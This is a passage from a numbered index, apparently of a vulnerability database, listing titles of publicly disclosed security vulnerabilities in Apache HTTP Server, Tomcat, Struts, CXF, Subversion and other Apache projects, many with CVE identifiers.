4097| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
4098| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
4099| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
4100| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
4101| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
4102| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
4103| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
4104| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
4105| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
4106| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
4107| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
4108| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
4109| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
4110| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
4111| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
4112| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
4113| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
4114| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
4115| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
4116| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
4117| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
4118| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
4119| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
4120| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
4121| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
4122| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
4123| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
4124| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
4125| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
4126| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
4127| [59670] Apache VCL Multiple Input Validation Vulnerabilities
4128| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
4129| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
4130| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
4131| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
4132| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
4133| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
4134| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
4135| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
4136| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
4137| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
4138| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
4139| [58376] Apache Qpid CVE-2012-4458 Denial of Service Vulnerability
4140| [58337] Apache Qpid CVE-2012-4459 Denial of Service Vulnerability
4141| [58326] Apache Commons FileUpload CVE-2013-0248 Insecure Temporary File Creation Vulnerability
4142| [58325] Debian Apache HTTP Server CVE-2013-1048 Symlink Attack Local Privilege Escalation Vulnerability
4143| [58323] Apache Subversion 'svn_fs_file_length()' Remote Denial of Service Vulnerability
4144| [58165] Apache HTTP Server Multiple Cross Site Scripting Vulnerabilities
4145| [58136] Apache Maven CVE-2013-0253 SSL Certificate Validation Security Bypass Vulnerability
4146| [58124] Apache Tomcat 'log/logdir' Directory Insecure File Permissions Vulnerability
4147| [58073] Apache Commons HttpClient CVE-2012-5783 SSL Certificate Validation Security Bypass Vulnerability
4148| [57876] Apache CXF WS-SecurityPolicy Authentication Bypass Vulnerability
4149| [57874] Apache CXF CVE-2012-5633 Security Bypass Vulnerability
4150| [57463] Apache OFBiz CVE-2013-0177 Multiple Cross Site Scripting Vulnerabilities
4151| [57425] Apache CXF CVE-2012-5786 SSL Certificate Validation Security Bypass Vulnerability
4152| [57321] Apache CouchDB CVE-2012-5650 Cross Site Scripting Vulnerability
4153| [57314] Apache CouchDB CVE-2012-5649 Remote Code Execution Vulnerability
4154| [57267] Apache Axis2/C SSL Certificate Validation Security Bypass Vulnerability
4155| [57259] Apache CloudStack CVE-2012-5616 Local Information Disclosure Vulnerability
4156| [56814] Apache Tomcat CVE-2012-4431 Cross-Site Request Forgery Vulnerability
4157| [56813] Apache Tomcat CVE-2012-4534 Denial of Service Vulnerability
4158| [56812] Apache Tomcat CVE-2012-3546 Security Bypass Vulnerability
4159| [56753] Apache Apache HTTP Server 'mod_proxy_ajp Module Denial Of Service Vulnerability
4160| [56686] Apache Tomcat CVE-2012-5568 Denial of Service Vulnerability
4161| [56408] Apache Axis and Axis2/Java SSL Certificate Validation Security Bypass Vulnerability
4162| [56403] Apache Tomcat DIGEST Authentication Multiple Security Weaknesses
4163| [56402] Apache Tomcat CVE-2012-2733 Denial of Service Vulnerability
4164| [56171] Apache OFBiz CVE-2012-3506 Unspecified Security Vulnerability
4165| [55876] Apache CloudStack CVE-2012-4501 Security Bypass Vulnerability
4166| [55628] Apache CXF SOAP Action Spoofing Security Bypass Vulnerability
4167| [55608] Apache Qpid (qpidd) Denial of Service Vulnerability
4168| [55536] Apache 'mod_pagespeed' Module Cross Site Scripting and Security Bypass Vulnerabilities
4169| [55508] Apache Axis2 XML Signature Wrapping Security Vulnerability
4170| [55445] Apache Wicket CVE-2012-3373 Cross Site Scripting Vulnerability
4171| [55346] Apache Struts Cross Site Request Forgery and Denial of Service Vulnerabilities
4172| [55290] Drupal Apache Solr Autocomplete Module Cross Site Scripting Vulnerability
4173| [55165] Apache Struts2 Skill Name Remote Code Execution Vulnerability
4174| [55154] Apache 'mod-rpaf' Module Denial of Service Vulnerability
4175| [55131] Apache HTTP Server HTML-Injection And Information Disclosure Vulnerabilities
4176| [54954] Apache QPID NullAuthenticator Authentication Bypass Vulnerability
4177| [54798] Apache Libcloud Man In The Middle Vulnerability
4178| [54358] Apache Hadoop CVE-2012-3376 Information Disclosure Vulnerability
4179| [54341] Apache Sling CVE-2012-2138 Denial Of Service Vulnerability
4180| [54268] Apache Hadoop Symlink Attack Local Privilege Escalation Vulnerability
4181| [54189] Apache Roller Cross Site Request Forgery Vulnerability
4182| [54187] Apache Roller CVE-2012-2381 Cross Site Scripting Vulnerability
4183| [53880] Apache CXF Child Policies Security Bypass Vulnerability
4184| [53877] Apache CXF Elements Validation Security Bypass Vulnerability
4185| [53676] Apache Commons Compress and Apache Ant CVE-2012-2098 Denial Of Service Vulnerability
4186| [53487] Apache POI CVE-2012-0213 Denial Of Service Vulnerability
4187| [53455] PHP 'apache_request_headers()' Function Buffer Overflow Vulnerability
4188| [53305] Apache Qpid CVE-2011-3620 Unauthorized Access Security Bypass Vulnerability
4189| [53046] Apache HTTP Server 'LD_LIBRARY_PATH' Insecure Library Loading Arbitrary Code Execution Vulnerability
4190| [53025] Apache OFBiz Unspecified Remote Code Execution Vulnerability
4191| [53023] Apache OFBiz Multiple Cross Site Scripting Vulnerabilities
4192| [52939] Apache Hadoop CVE-2012-1574 Unspecified User Impersonation Vulnerability
4193| [52702] Apache Struts2 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability
4194| [52696] Apache Traffic Server HTTP Host Header Handling Heap Based Buffer Overflow Vulnerability
4195| [52680] Apache Wicket 'pageMapName' Parameter Cross Site Scripting Vulnerability
4196| [52679] Apache Wicket Hidden Files Information Disclosure Vulnerability
4197| [52565] Apache 'mod_fcgid' Module Denial Of Service Vulnerability
4198| [52146] TYPO3 Apache Solr Extension Unspecified Cross Site Scripting Vulnerability
4199| [51939] Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability
4200| [51917] Apache APR Hash Collision Denial Of Service Vulnerability
4201| [51902] Apache Struts Multiple HTML Injection Vulnerabilities
4202| [51900] Apache Struts CVE-2012-1007 Multiple Cross Site Scripting Vulnerabilities
4203| [51886] Apache CXF UsernameToken Policy Validation Security Bypass Vulnerability
4204| [51869] Apache HTTP Server CVE-2011-3639 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
4205| [51706] Apache HTTP Server 'httpOnly' Cookie Information Disclosure Vulnerability
4206| [51705] Apache HTTP Server CVE-2012-0021 mod_log_config Denial Of Service Vulnerability
4207| [51628] Apache Struts 'ParameterInterceptor' Class OGNL (CVE-2011-3923) Security Bypass Vulnerability
4208| [51447] Apache Tomcat Parameter Handling Denial of Service Vulnerability
4209| [51442] Apache Tomcat Request Object Security Bypass Vulnerability
4210| [51407] Apache HTTP Server Scoreboard Local Security Bypass Vulnerability
4211| [51257] Apache Struts Remote Command Execution and Arbitrary File Overwrite Vulnerabilities
4212| [51238] Apache Geronimo Hash Collision Denial Of Service Vulnerability
4213| [51200] Apache Tomcat Hash Collision Denial Of Service Vulnerability
4214| [50940] Apache Struts Session Tampering Security Bypass Vulnerability
4215| [50912] RETIRED: Apache MyFaces CVE-2011-4343 Information Disclosure Vulnerability
4216| [50904] Apache ActiveMQ Failover Mechanism Remote Denial Of Service Vulnerability
4217| [50848] Apache MyFaces EL Expression Evaluation Security Bypass Vulnerability
4218| [50802] Apache HTTP Server 'mod_proxy' Reverse Proxy Security Bypass Vulnerability
4219| [50639] Apache HTTP Server 'ap_pregsub()' Function Local Denial of Service Vulnerability
4220| [50603] Apache Tomcat Manager Application Security Bypass Vulnerability
4221| [50494] Apache HTTP Server 'ap_pregsub()' Function Local Privilege Escalation Vulnerability
4222| [49957] Apache HTTP Server 'mod_proxy' Reverse Proxy Information Disclosure Vulnerability
4223| [49762] Apache Tomcat HTTP DIGEST Authentication Multiple Security Weaknesses
4224| [49728] Apache Struts Conversion Error OGNL Expression Evaluation Vulnerability
4225| [49616] Apache HTTP Server CVE-2011-3348 Denial Of Service Vulnerability
4226| [49470] Apache Tomcat CVE-2007-6286 Duplicate Request Processing Security Vulnerability
4227| [49353] Apache Tomcat AJP Protocol Security Bypass Vulnerability
4228| [49303] Apache HTTP Server CVE-2011-3192 Denial Of Service Vulnerability
4229| [49290] Apache Wicket Cross Site Scripting Vulnerability
4230| [49147] Apache Tomcat CVE-2011-2481 Information Disclosure Vulnerability
4231| [49143] Apache Commons Daemon 'jsvc' Information Disclosure Vulnerability
4232| [48667] Apache Tomcat 'sendfile' Request Attributes Information Disclosure Vulnerability
4233| [48653] Apache 'mod_authnz_external' Module SQL Injection Vulnerability
4234| [48611] Apache XML Security for C++ Signature Key Parsing Denial of Service Vulnerability
4235| [48456] Apache Tomcat 'MemoryUserDatabase' Information Disclosure Vulnerability
4236| [48015] Apache Archiva Multiple Cross Site Request Forgery Vulnerabilities
4237| [48011] Apache Archiva Multiple Cross Site Scripting and HTML Injection Vulnerabilities
4238| [47929] Apache APR 'apr_fnmatch.c' Denial of Service Vulnerability
4239| [47890] Apache Struts 'javatemplates' Plugin Multiple Cross Site Scripting Vulnerabilities
4240| [47886] Apache Tomcat SecurityConstraints Security Bypass Vulnerability
4241| [47820] Apache APR 'apr_fnmatch()' Denial of Service Vulnerability
4242| [47784] Apache Struts XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability
4243| [47199] Apache Tomcat HTTP BIO Connector Information Disclosure Vulnerability
4244| [47196] Apache Tomcat Login Constraints Security Bypass Vulnerability
4245| [46974] Apache HttpComponents 'HttpClient' Information Disclosure Vulnerability
4246| [46953] Apache MPM-ITK Module Security Weakness
4247| [46734] Subversion 'mod_dav_svn' Apache Server NULL Pointer Dereference Denial Of Service Vulnerability
4248| [46685] Apache Tomcat '@ServletSecurity' Annotations Security Bypass Vulnerability
4249| [46311] Apache Continuum and Archiva Cross Site Scripting Vulnerability
4250| [46177] Apache Tomcat SecurityManager Security Bypass Vulnerability
4251| [46174] Apache Tomcat HTML Manager Interface HTML Injection Vulnerability
4252| [46166] Apache Tomcat JVM Denial of Service Vulnerability
4253| [46164] Apache Tomcat NIO Connector Denial of Service Vulnerability
4254| [46066] Apache CouchDB Web Administration Interface Cross Site Scripting Vulnerability
4255| [45655] Apache Subversion Server Component Multiple Remote Denial Of Service Vulnerabilities
4256| [45123] Awstats Apache Tomcat Configuration File Remote Arbitrary Command Execution Vulnerability
4257| [45095] Apache Archiva Cross Site Request Forgery Vulnerability
4258| [45015] Apache Tomcat 'sort' and 'orderBy' Parameters Cross Site Scripting Vulnerabilities
4259| [44900] Apache 'mod_fcgid' Module Unspecified Stack Buffer Overflow Vulnerability
4260| [44616] Apache Shiro Directory Traversal Vulnerability
4261| [44355] Apache MyFaces Encrypted View State Oracle Padding Security Vulnerability
4262| [44068] Apache::AuthenHook Local Information Disclosure Vulnerability
4263| [43862] Apache QPID SSL Connection Denial of Service Vulnerability
4264| [43673] Apache APR-util 'apr_brigade_split_line()' Denial of Service Vulnerability
4265| [43637] Apache XML-RPC SAX Parser Information Disclosure Vulnerability
4266| [43111] Apache Traffic Server Remote DNS Cache Poisoning Vulnerability
4267| [42637] Apache Derby 'BUILTIN' Authentication Insecure Password Hashing Vulnerability
4268| [42501] Apache CouchDB Cross Site Request Forgery Vulnerability
4269| [42492] Apache CXF XML DTD Processing Security Vulnerability
4270| [42121] Apache SLMS Insufficient Quoting Cross Site Request Forgery Vulnerability
4271| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
4272| [41963] Apache HTTP Server Multiple Remote Denial of Service Vulnerabilities
4273| [41544] Apache Tomcat 'Transfer-Encoding' Information Disclosure and Denial Of Service Vulnerabilities
4274| [41076] Apache Axis2 '/axis2/axis2-admin' Session Fixation Vulnerability
4275| [40976] Apache Axis2 Document Type Declaration Processing Security Vulnerability
4276| [40827] Apache 'mod_proxy_http' Timeout Handling Information Disclosure Vulnerability
4277| [40343] Apache Axis2 'xsd' Parameter Directory Traversal Vulnerability
4278| [40327] Apache Axis2 'engagingglobally' Cross-Site Scripting Vulnerability
4279| [39771] Apache ActiveMQ 'admin/queueBrowse' Cross Site Scripting Vulnerability
4280| [39636] Apache ActiveMQ Source Code Information Disclosure Vulnerability
4281| [39635] Apache Tomcat Authentication Header Realm Name Information Disclosure Vulnerability
4282| [39538] Apache mod_auth_shadow Race Condition Security Bypass Vulnerability
4283| [39489] Apache OFBiz Multiple Cross Site Scripting and HTML Injection Vulnerabilities
4284| [39119] Apache ActiveMQ 'createDestination.action' HTML Injection Vulnerability
4285| [38580] Apache Subrequest Handling Information Disclosure Vulnerability
4286| [38494] Apache 'mod_isapi' Memory Corruption Vulnerability
4287| [38491] Apache mod_proxy_ajp Module Incoming Request Body Denial Of Service Vulnerability
4288| [37966] Apache 1.3 mod_proxy HTTP Chunked Encoding Integer Overflow Vulnerability
4289| [37945] Apache Tomcat Host Working Directory WAR File Directory Traversal Vulnerability
4290| [37944] Apache Tomcat WAR File Directory Traversal Vulnerability
4291| [37942] Apache Tomcat Directory Host Appbase Authentication Bypass Vulnerability
4292| [37149] Apache Tomcat 404 Error Page Cross Site Scripting Vulnerability
4293| [37027] RETIRED: Apache APR 'apr_uri_parse_hostinfo' Off By One Remote Code Execution Vulnerability
4294| [36990] Apache HTTP TRACE Cross Site Scripting Vulnerability
4295| [36954] Apache Tomcat Windows Installer Insecure Password Vulnerability
4296| [36889] TYPO3 Apache Solr Search Extension Unspecified Cross Site Scripting Vulnerability
4297| [36596] Apache HTTP Server Solaris Event Port Pollset Support Remote Denial Of Service Vulnerability
4298| [36260] Apache mod_proxy_ftp Module NULL Pointer Dereference Denial Of Service Vulnerability
4299| [36254] Apache mod_proxy_ftp Remote Command Injection Vulnerability
4300| [35949] Apache APR and APR-util Multiple Integer Overflow Vulnerabilities
4301| [35840] Apache HTTP Server HTTP-Basic Authentication Bypass Vulnerability
4302| [35623] Apache 'mod_deflate' Remote Denial Of Service Vulnerability
4303| [35565] Apache 'mod_proxy' Remote Denial Of Service Vulnerability
4304| [35416] Apache Tomcat XML Parser Information Disclosure Vulnerability
4305| [35263] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
4306| [35253] Apache APR-util 'xml/apr_xml.c' Denial of Service Vulnerability
4307| [35251] Apache APR-util 'apr_brigade_vprintf' Off By One Vulnerability
4308| [35221] Apache APR-util 'apr_strmatch_precompile()' Integer Underflow Vulnerability
4309| [35196] Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness
4310| [35193] Apache Tomcat Java AJP Connector Invalid Header Denial of Service Vulnerability
4311| [35115] Apache 'Options' and 'AllowOverride' Directives Security Bypass Vulnerability
4312| [34686] Apache Struts Multiple Cross Site Scripting Vulnerabilities
4313| [34663] Apache 'mod_proxy_ajp' Information Disclosure Vulnerability
4314| [34657] Apache Tiles Cross Site Scripting And Information Disclosure Vulnerabilities
4315| [34562] Apache Geronimo Application Server Multiple Remote Vulnerabilities
4316| [34552] Apache ActiveMQ Web Console Multiple Unspecified HTML Injection Vulnerabilities
4317| [34412] Apache Tomcat mod_jk Content Length Information Disclosure Vulnerability
4318| [34399] Apache Struts Unspecified Cross Site Scripting Vulnerability
4319| [34383] Apache mod_perl 'Apache::Status' and 'Apache2::Status' Cross Site Scripting Vulnerability
4320| [33913] Apache Tomcat POST Data Information Disclosure Vulnerability
4321| [33360] Apache Jackrabbit 'q' Parameter Multiple Cross Site Scripting Vulnerabilities
4322| [33110] Apache Roller 'q' Parameter Cross Site Scripting Vulnerability
4323| [32657] Novell NetWare ApacheAdmin Security Bypass Vulnerability
4324| [31805] Apache HTTP Server OS Fingerprinting Unspecified Security Vulnerability
4325| [31761] Oracle WebLogic Server Apache Connector Stack Based Buffer Overflow Vulnerability
4326| [31698] Apache Tomcat 'RemoteFilterValve' Security Bypass Vulnerability
4327| [31165] Kolab Groupware Server Apache Log File User Password Information Disclosure Vulnerability
4328| [30560] Apache 'mod_proxy_ftp' Wildcard Characters Cross-Site Scripting Vulnerability
4329| [30496] Apache Tomcat 'HttpServletResponse.sendError()' Cross Site Scripting Vulnerability
4330| [30494] Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability
4331| [29653] Apache 'mod_proxy_http' Interim Response Denial of Service Vulnerability
4332| [29502] Apache Tomcat Host Manager Cross Site Scripting Vulnerability
4333| [28576] Apache-SSL Environment Variable Information Disclosure and Privilege Escalation Vulnerability
4334| [28484] Apache Tomcat Requests Containing MS-DOS Device Names Information Disclosure Vulnerability
4335| [28483] Apache Tomcat 'allowLinking' Accepts NULL Byte in URI Information Disclosure Vulnerability
4336| [28482] Apache Tomcat SSL Anonymous Cipher Configuration Information Disclosure Vulnerability
4337| [28481] Apache Tomcat Cross-Site Scripting Vulnerability
4338| [28477] Apache Tomcat AJP Connector Information Disclosure Vulnerability
4339| [27752] Apache mod_jk2 Host Header Multiple Stack Based Buffer Overflow Vulnerabilities
4340| [27706] Apache Tomcat Cookie Quote Handling Remote Information Disclosure Vulnerability
4341| [27703] Apache Tomcat Parameter Processing Remote Information Disclosure Vulnerability
4342| [27409] Apache 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
4343| [27365] Apache Tomcat SingleSignOn Remote Information Disclosure Vulnerability
4344| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
4345| [27236] Apache 'mod_proxy_balancer' Multiple Vulnerabilities
4346| [27234] Apache 'mod_proxy_ftp' Undefined Charset UTF-7 Cross-Site Scripting Vulnerability
4347| [27006] Apache Tomcat JULI Logging Component Default Security Policy Vulnerability
4348| [26939] Apache HTTP Server Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
4349| [26838] Apache mod_imagemap and mod_imap Cross-Site Scripting Vulnerability
4350| [26762] Apache::AuthCAS Cookie SQL Injection Vulnerability
4351| [26663] Apache HTTP Server 413 Error HTTP Request Method Cross-Site Scripting Weakness
4352| [26287] Apache Geronimo SQLLoginModule Authentication Bypass Vulnerability
4353| [26070] Apache Tomcat WebDav Remote Information Disclosure Vulnerability
4354| [25804] Apache Geronimo Management EJB Security Bypass Vulnerability
4355| [25653] Apache Mod_AutoIndex.C Undefined Charset Cross-Site Scripting Vulnerability
4356| [25531] Apache Tomcat Cal2.JSP Cross-Site Scripting Vulnerability
4357| [25489] Apache HTTP Server Mod_Proxy Denial of Service Vulnerability
4358| [25316] Apache Tomcat Multiple Remote Information Disclosure Vulnerabilities
4359| [25314] Apache Tomcat Host Manager Servlet Cross Site Scripting Vulnerability
4360| [25174] Apache Tomcat Error Message Reporting Cross Site Scripting Vulnerability
4361| [24999] Apache Tomcat SendMailServlet Cross-Site Scripting Vulnerability
4362| [24759] MySQLDumper Apache Access Control Authentication Bypass Vulnerability
4363| [24649] Apache HTTP Server Mod_Cache Denial of Service Vulnerability
4364| [24645] Apache HTTP Server Mod_Status Cross-Site Scripting Vulnerability
4365| [24553] Apache Mod_Mem_Cache Information Disclosure Vulnerability
4366| [24524] Apache Tomcat Accept-Language Cross Site Scripting Vulnerability
4367| [24480] Apache MyFaces Tomahawk JSF Framework Autoscroll Parameter Cross Site Scripting Vulnerability
4368| [24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
4369| [24475] Apache Tomcat Manager and Host Manager Upload Script Cross-Site Scripting Vulnerability
4370| [24215] Apache HTTP Server Worker Process Multiple Denial of Service Vulnerabilities
4371| [24147] Apache Tomcat JK Connector Double Encoding Security Bypass Vulnerability
4372| [24058] Apache Tomcat Documentation Sample Application Multiple Cross-Site Scripting Vulnerabilities
4373| [23687] Apache AXIS Non-Existent WSDL Path Information Disclosure Vulnerability
4374| [23438] Apache HTTPD suEXEC Local Multiple Privilege Escalation Weaknesses
4375| [22960] Apache HTTP Server Tomcat Directory Traversal Vulnerability
4376| [22849] Apache mod_python Output Filter Mode Information Disclosure Vulnerability
4377| [22791] Apache Tomcat Mod_JK.SO Arbitrary Code Execution Vulnerability
4378| [22732] Debian Apache Root Shell Local Privilege Escalation Vulnerabilities
4379| [22388] Apache Stats Extract Function Multiple Input Validation Vulnerabilities
4380| [21865] Apache And Microsoft IIS Range Denial of Service Vulnerability
4381| [21214] Apache Mod_Auth_Kerb Off-By-One Denial of Service Vulnerability
4382| [20527] Apache Mod_TCL Remote Format String Vulnerability
4383| [19661] Apache HTTP Server Arbitrary HTTP Request Headers Security Weakness
4384| [19447] Apache CGI Script Source Code Information Disclosure Vulnerability
4385| [19204] Apache Mod_Rewrite Off-By-One Buffer Overflow Vulnerability
4386| [19106] Apache Tomcat Information Disclosure Vulnerability
4387| [18138] Apache James SMTP Denial Of Service Vulnerability
4388| [17342] Apache Struts Multiple Remote Vulnerabilities
4389| [17095] Apache Log4Net Denial Of Service Vulnerability
4390| [16916] Apache mod_python FileSession Code Execution Vulnerability
4391| [16710] Apache Libapreq2 Quadratic Behavior Denial of Service Vulnerability
4392| [16260] Apache Geronimo Multiple Input Validation Vulnerabilities
4393| [16153] Apache mod_auth_pgsql Multiple Format String Vulnerabilities
4394| [16152] Apache Mod_SSL Custom Error Document Remote Denial Of Service Vulnerability
4395| [15834] Apache 'mod_imap' Referer Cross-Site Scripting Vulnerability
4396| [15765] Apache James Spooler Memory Leak Denial Of Service Vulnerability
4397| [15762] Apache MPM Worker.C Denial Of Service Vulnerability
4398| [15512] Apache Struts Error Response Cross-Site Scripting Vulnerability
4399| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
4400| [15325] Apache Tomcat Simultaneous Directory Listing Denial Of Service Vulnerability
4401| [15224] Apache Mod_Auth_Shadow Authentication Bypass Vulnerability
4402| [15177] PHP Apache 2 Local Denial of Service Vulnerability
4403| [14982] ApacheTop Insecure Temporary File Creation Vulnerability
4404| [14721] Apache Mod_SSL SSLVerifyClient Restriction Bypass Vulnerability
4405| [14660] Apache CGI Byterange Request Denial of Service Vulnerability
4406| [14366] Apache mod_ssl CRL Handling Off-By-One Buffer Overflow Vulnerability
4407| [14106] Apache HTTP Request Smuggling Vulnerability
4408| [13778] Apache HTPasswd Password Command Line Argument Buffer Overflow Vulnerability
4409| [13777] Apache HTPasswd User Command Line Argument Buffer Overflow Vulnerability
4410| [13756] Apache Tomcat Java Security Manager Bypass Vulnerability
4411| [13537] Apache HTDigest Realm Command Line Argument Buffer Overflow Vulnerability
4412| [12877] Apache mod_ssl ssl_io_filter_cleanup Remote Denial Of Service Vulnerability
4413| [12795] Apache Tomcat Remote Malformed Request Denial Of Service Vulnerability
4414| [12619] Apache Software Foundation Batik Squiggle Browser Access Validation Vulnerability
4415| [12519] Apache mod_python Module Publisher Handler Information Disclosure Vulnerability
4416| [12308] Apache Utilities Insecure Temporary File Creation Vulnerability
4417| [12217] Apache mod_auth_radius Malformed RADIUS Server Reply Integer Overflow Vulnerability
4418| [12181] Mod_DOSEvasive Apache Module Local Insecure Temporary File Creation Vulnerability
4419| [11803] Apache Jakarta Results.JSP Remote Cross-Site Scripting Vulnerability
4420| [11471] Apache mod_include Local Buffer Overflow Vulnerability
4421| [11360] Apache mod_ssl SSLCipherSuite Restriction Bypass Vulnerability
4422| [11239] Apache Satisfy Directive Access Control Bypass Vulnerability
4423| [11187] Apache Web Server Remote IPv6 Buffer Overflow Vulnerability
4424| [11185] Apache Mod_DAV LOCK Denial Of Service Vulnerability
4425| [11182] Apache Web Server Configuration File Environment Variable Local Buffer Overflow Vulnerability
4426| [11154] Apache mod_ssl Remote Denial of Service Vulnerability
4427| [11094] Apache mod_ssl Denial Of Service Vulnerability
4428| [10789] Apache mod_userdir Module Information Disclosure Vulnerability
4429| [10736] Apache 'mod_ssl' Log Function Format String Vulnerability
4430| [10619] Apache ap_escape_html Memory Allocation Denial Of Service Vulnerability
4431| [10508] Apache Mod_Proxy Remote Negative Content-Length Buffer Overflow Vulnerability
4432| [10478] ClueCentral Apache Suexec Patch Security Weakness
4433| [10355] Apache 'mod_ssl' 'ssl_util_uuencode_binary()' Stack Buffer Overflow Vulnerability
4434| [10212] Apache mod_auth Malformed Password Potential Memory Corruption Vulnerability
4435| [9933] Apache mod_disk_cache Module Client Authentication Credential Storage Weakness
4436| [9930] Apache Error and Access Logs Escape Sequence Injection Vulnerability
4437| [9921] Apache Connection Blocking Denial Of Service Vulnerability
4438| [9885] Apache Mod_Security Module SecFilterScanPost Off-By-One Buffer Overflow Vulnerability
4439| [9874] Apache HTAccess LIMIT Directive Bypass Configuration Error Weakness
4440| [9829] Apache Mod_Access Access Control Rule Bypass Vulnerability
4441| [9826] Apache Mod_SSL HTTP Request Remote Denial Of Service Vulnerability
4442| [9733] Apache Cygwin Directory Traversal Vulnerability
4443| [9599] Apache mod_php Global Variables Information Disclosure Weakness
4444| [9590] Apache-SSL Client Certificate Forging Vulnerability
4445| [9571] Apache mod_digest Client-Supplied Nonce Verification Vulnerability
4446| [9471] Apache mod_perl Module File Descriptor Leakage Vulnerability
4447| [9404] Mod-Auth-Shadow Apache Module Expired User Credential Weakness
4448| [9302] Apache mod_php Module File Descriptor Leakage Vulnerability
4449| [9129] Apache mod_python Module Malformed Query Denial of Service Vulnerability
4450| [8926] Apache Web Server mod_cgid Module CGI Data Redirection Vulnerability
4451| [8919] Apache Mod_Security Module Heap Corruption Vulnerability
4452| [8911] Apache Web Server Multiple Module Local Buffer Overflow Vulnerability
4453| [8898] Red Hat Apache Directory Index Default Configuration Error
4454| [8883] Apache Cocoon Directory Traversal Vulnerability
4455| [8824] Apache Tomcat Non-HTTP Request Denial Of Service Vulnerability
4456| [8822] Apache Mod_Throttle Module Local Shared Memory Corruption Vulnerability
4457| [8725] Apache2 MOD_CGI STDERR Denial Of Service Vulnerability
4458| [8707] Apache htpasswd Password Entropy Weakness
4459| [8561] Apache::Gallery Insecure Local File Storage Privilege Escalation Vulnerability
4460| [8287] Mod_Mylo Apache Module REQSTR Buffer Overflow Vulnerability
4461| [8226] Apache HTTP Server Multiple Vulnerabilities
4462| [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability
4463| [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability
4464| [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability
4465| [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability
4466| [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness
4467| [7768] Apache Tomcat Insecure Directory Permissions Vulnerability
4468| [7725] Apache Basic Authentication Module Valid User Login Denial Of Service Vulnerability
4469| [7723] Apache APR_PSPrintf Memory Corruption Vulnerability
4470| [7448] Apache Mod_Auth_Any Remote Command Execution Vulnerability
4471| [7375] Apache Mod_Access_Referer NULL Pointer Dereference Denial of Service Vulnerability
4472| [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability
4473| [7255] Apache Web Server File Descriptor Leakage Vulnerability
4474| [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
4475| [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability
4476| [6939] Apache Web Server ETag Header Information Disclosure Weakness
4477| [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability
